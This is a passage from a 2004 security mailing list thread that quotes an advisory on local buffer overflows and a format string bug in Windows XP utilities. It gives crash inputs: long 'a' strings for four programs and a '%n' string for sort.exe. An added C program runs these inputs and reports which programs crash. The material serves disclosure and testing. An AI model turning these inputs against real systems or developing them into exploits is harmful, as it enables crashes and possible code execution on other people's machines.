> Hi guys, a little comeback after moving.
>
> I don't remember having seen these details, sorry if I'm wrong.
You obviously haven't read the lists then:
http://seclists.org/lists/bugtraq/2004/Oct/0045.html
I wrote about Windows local BoFs and format strings a few weeks back and
included a simple command to test for these. Also, I've tried to exploit a
few and it's pretty hard to actually do that for a very simple program
like sort.
Cheers,
SkyLined
>
> AUTHOR
> Komrade
>
> DATE
> 08/10/2004
>
> PRODUCT
> Windows XP
> Tested on Windows XP Service Pack 2, prior versions should have the same
> bugs.
>
> DETAILS
> Here is a list of some Windows XP utilities that are vulnerable to local
> buffer overflows and format string bugs.
> These programming errors, alone, are not security vulnerabilities (you
> need local access and you don't gain more privilege), but they could
> become serious security issues if someone has the possibility to remotely
> start a program with at least one parameter (as happens with the "shell:"
> protocol security issue in the Mozilla browser prior to version 1.7.3,
> which permits remotely executing a program and passing parameters to it).
>
> This information has been disclosed to inform you that if a new
> vulnerability is discovered which allows remote execution of programs
> (passing parameters), all Windows XP operating systems will be affected by
> several remote buffer overflows and format string vulnerabilities allowing
> remote code execution.
>
> Buffer Overflow in immc.exe
> POC
> c:\> immc.exe aaaaaaaaaa(285 'a' characters)
>
> Buffer Overflow in eventvwr.exe (UNICODE)
> POC
> c:\> eventvwr.exe aaaaaaaaaa(848 'a' characters)
>
> Buffer Overflow in netsetup.exe
> POC
> c:\> netsetup.exe aaaaaaaaaa(285 'a' characters)
>
> Buffer Overflow in mrinfo.exe
> POC
> c:\> mrinfo.exe aaaaaaaaaa(71 'a' characters)
>
> Format String in sort.exe
> POC
> c:\> sort.exe %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
>
>
> SCAN TOOL
>
> This tool scans your PC, checking whether it is affected by one of these
> local bugs.
> This tool only makes a system() call, starting the vulnerable programs
> with the appropriate parameters.
>
> http://unsecure.altervista.org/security/xplocalscan.c
>
> Regards,
> Jerome
Received on Oct 25 2004
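The scan tool quoted in the advisory is described only as "a system() call, starting the vulnerable programs with the opportune parameters". The following is an added illustration of that idea, written for this page; it is neither Komrade's xplocalscan.c nor SkyLined's test command. It reproduces the five cases quoted above (program name, repeat count or literal format string), builds each command line in a separate function so the payload construction can be checked without running anything, and then hands the command to system(). Two assumptions are made and marked in the code: that system() on Windows returns the child's exit code directly (cmd.exe /c passes it through), and that an unhandled access violation in the child shows up as the NTSTATUS exit code 0xC0000005 (STATUS_ACCESS_VIOLATION), which becomes the negative int -1073741819. Neither holds on POSIX, where system() returns a wait status instead.

```c
/* Added example: an argv-overflow / format-string smoke tester modelled on
 * the SCAN TOOL described in the advisory. Not the original xplocalscan.c.
 * Builds "<prog> <argument>" for each case quoted in the advisory, runs it
 * through system(), and reports whether the child died with an access
 * violation. The exit-code mapping is an assumption (Windows only). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: an unhandled access violation in the child is reported by
 * system() on Windows as this NTSTATUS value (as a negative int). */
#define STATUS_ACCESS_VIOLATION 0xC0000005u

struct probe {
    const char *prog;     /* program name as quoted in the advisory */
    char        fill;     /* character to repeat; unused when literal is set */
    size_t      len;      /* number of repetitions of fill */
    const char *literal;  /* literal argument (format string case) or NULL */
};

/* The five cases quoted in the advisory, with the same lengths. */
static const struct probe probes[] = {
    { "immc.exe",     'a', 285, NULL },
    { "eventvwr.exe", 'a', 848, NULL },
    { "netsetup.exe", 'a', 285, NULL },
    { "mrinfo.exe",   'a',  71, NULL },
    { "sort.exe",     0,     0, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n" },
};

/* Write "<prog> <argument>" into buf. Returns the length written (without
 * the terminating NUL), or 0 if buf cannot hold it. Kept separate from the
 * execution step so the payload can be inspected before anything runs. */
size_t build_command(char *buf, size_t bufsz, const struct probe *p)
{
    size_t proglen = strlen(p->prog);
    size_t arglen  = p->literal ? strlen(p->literal) : p->len;
    size_t total   = proglen + 1 + arglen;

    if (total + 1 > bufsz)          /* +1 for the NUL terminator */
        return 0;

    memcpy(buf, p->prog, proglen);
    buf[proglen] = ' ';
    if (p->literal)
        memcpy(buf + proglen + 1, p->literal, arglen);
    else
        memset(buf + proglen + 1, p->fill, arglen);
    buf[total] = '\0';
    return total;
}

/* 1 if a system() return value looks like an access violation. The cast
 * turns the negative int that 0xC0000005 becomes back into the NTSTATUS. */
int looks_like_crash(int status)
{
    return (unsigned int)status == STATUS_ACCESS_VIOLATION;
}

/* Run every probe, print one line per program, return how many crashed. */
int run_probes(void)
{
    char cmd[2048];
    int crashed = 0;
    size_t i;

    for (i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int status;
        if (!build_command(cmd, sizeof cmd, &probes[i])) {
            fprintf(stderr, "%s: command too long for buffer\n", probes[i].prog);
            continue;
        }
        status = system(cmd);
        if (looks_like_crash(status)) {
            printf("%-13s crashed (0x%08X)\n", probes[i].prog, (unsigned int)status);
            crashed++;
        } else {
            printf("%-13s exit status %d\n", probes[i].prog, status);
        }
    }
    return crashed;
}

int main(void)
{
    return run_probes() ? 1 : 0;
}
```

A non-zero exit from run_probes() means at least one program died with an access violation when given the quoted argument; any other exit status (a usage message, a "file not found" error from sort.exe) is printed as-is so the reader can judge it. Because the crash detection relies on the Windows exit-code convention, the same binary compiled on a POSIX system will build the commands correctly but will never report a crash.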